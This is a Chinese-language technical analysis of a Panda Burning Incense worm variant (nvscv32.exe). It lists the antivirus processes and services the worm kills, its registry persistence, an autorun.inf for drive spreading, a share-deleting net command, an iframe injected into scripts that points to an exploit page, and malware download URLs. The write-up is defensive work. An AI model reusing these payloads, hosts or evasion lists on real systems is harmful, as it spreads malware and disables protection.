熊猫烧香病毒nvscv32.exe变种手动清除方案

五、技术分析

　　1：病毒文件运行后，将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe

　　建立注册表自启动项：

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]

　　nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"

　　2：查找反病毒窗体病毒结束相关进程：

• 　　天网防火墙
• 　　virusscan
• 　　symantec antivirus
• 　　system safety monitor
• 　　system repair engineer
• 　　wrapped gift killer
• 　　游戏木马检测大师
• 　　超级巡警

　　3：结束以下进程

• 　　mcshield.exe
• 　　vstskmgr.exe
• 　　naprdmgr.exe
• 　　updaterui.exe
• 　　tbmon.exe
• 　　scan32.exe
• 　　ravmond.exe
• 　　ccenter.exe
• 　　ravtask.exe
• 　　rav.exe
• 　　ravmon.exe
• 　　ravmond.exe
• 　　ravstub.exe
• 　　kvxp.kxp
• 　　kvmonxp.kxp
• 　　kvcenter.kxp
• 　　kvsrvxp.exe
• 　　kregex.exe
• 　　uihost.exe
• 　　trojdie.kxp
• 　　frogagent.exe
• 　　kvxp.kxp
• 　　kvmonxp.kxp
• 　　kvcenter.kxp
• 　　kvsrvxp.exe
• 　　kregex.exe
• 　　uihost.exe
• 　　trojdie.kxp
• 　　frogagent.exe
• 　　logo1_.exe
• 　　logo_1.exe
• 　　rundl132.exe
• 　　taskmgr.exe
• 　　msconfig.exe
• 　　regedit.exe
• 　　sreng.exe 

　　4：禁用下列服务

• 　　schedule
• 　　sharedaccess
• 　　rsccenter
• 　　rsravmon
• 　　rsccenter
• 　　kvwsc
• 　　kvsrvxp
• 　　kvwsc
• 　　kvsrvxp
• 　　kavsvc
• 　　avp
• 　　avp
• 　　kavsvc
• 　　mcafeeframework
• 　　mcshield
• 　　mctaskmanager
• 　　mcafeeframework
• 　　mcshield
• 　　mctaskmanager
• 　　navapsvc
• 　　wscsvc
• 　　kpfwsvc
• 　　sndsrvc
• 　　ccproxy
• 　　ccevtmgr
• 　　ccsetmgr
• 　　spbbcsvc
• 　　symantec core lc
• 　　npfmntor
• 　　mskservice
• 　　firesvc

　　5：删除下列注册表项：

• 　　software\microsoft\windows\currentversion\run\ravtask
• 　　software\microsoft\windows\currentversion\run\kvmonxp
• 　　software\microsoft\windows\currentversion\run\kav
• 　　software\microsoft\windows\currentversion\run\kavpersonal50
• 　　software\microsoft\windows\currentversion\run\mcafeeupdaterui
• 　　software\microsoft\windows\currentversion\run\network associates error reporting service
• 　　software\microsoft\windows\currentversion\run\shstatexe
• 　　software\microsoft\windows\currentversion\run\ylive.exe
• 　　software\microsoft\windows\currentversion\run\yassistse

　　6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了）

　　7：跳过下列目录:

• 　　windows
• 　　winnt
• 　　systemvolumeinformation
• 　　recycled
• 　　windowsnt
• 　　windowsupdate
• 　　windowsmediaplayer
• 　　outlookexpress
• 　　netmeeting
• 　　commonfiles
• 　　complusapplications
• 　　commonfiles
• 　　messenger
• 　　installshieldinstallationinformation
• 　　msn
• 　　microsoftfrontpage
• 　　moviemaker
• 　　msngaminzone

　　8：删除*.gho备份文件。

　　9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统。

　　autorun.inf内容：

　　[AutoRun]
　　OPEN=setup.exe
　　shellexecute=setup.exe
　　shell\Auto\command=setup.exe

　　10：删除共享：cmd.exe /c net share admin$ /del /y

　　11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。

　　12：扫描局域网机器，一旦发现漏洞，就迅速传播。

　　13：在后台访问http：//www。whboy。net/update/wormcn。txt，根据下载列表下载其他病毒。

　　目前下载列表如下：（以下链接均为危险内容，请勿点击！）

• 　　http://www.krvkr.com/down/cq.exe
• 　　http://www.krvkr.com/down/mh.exe
• 　　http://www.krvkr.com/down/my.exe
• 　　http://www.krvkr.com/down/wl.exe
• 　　http://www.krvkr.com/down/rx.exe
• 　　http://www.krvkr.com/down/wow.exe
• 　　http://www.krvkr.com/down/zt.exe
• 　　http://www.krvkr.com/down/wm.exe
• 　　http://www.krvkr.com/down/dj.exe
• 　　http://www.krvkr.com/cn/iechajian.exe

　　到此病毒行为分析完毕。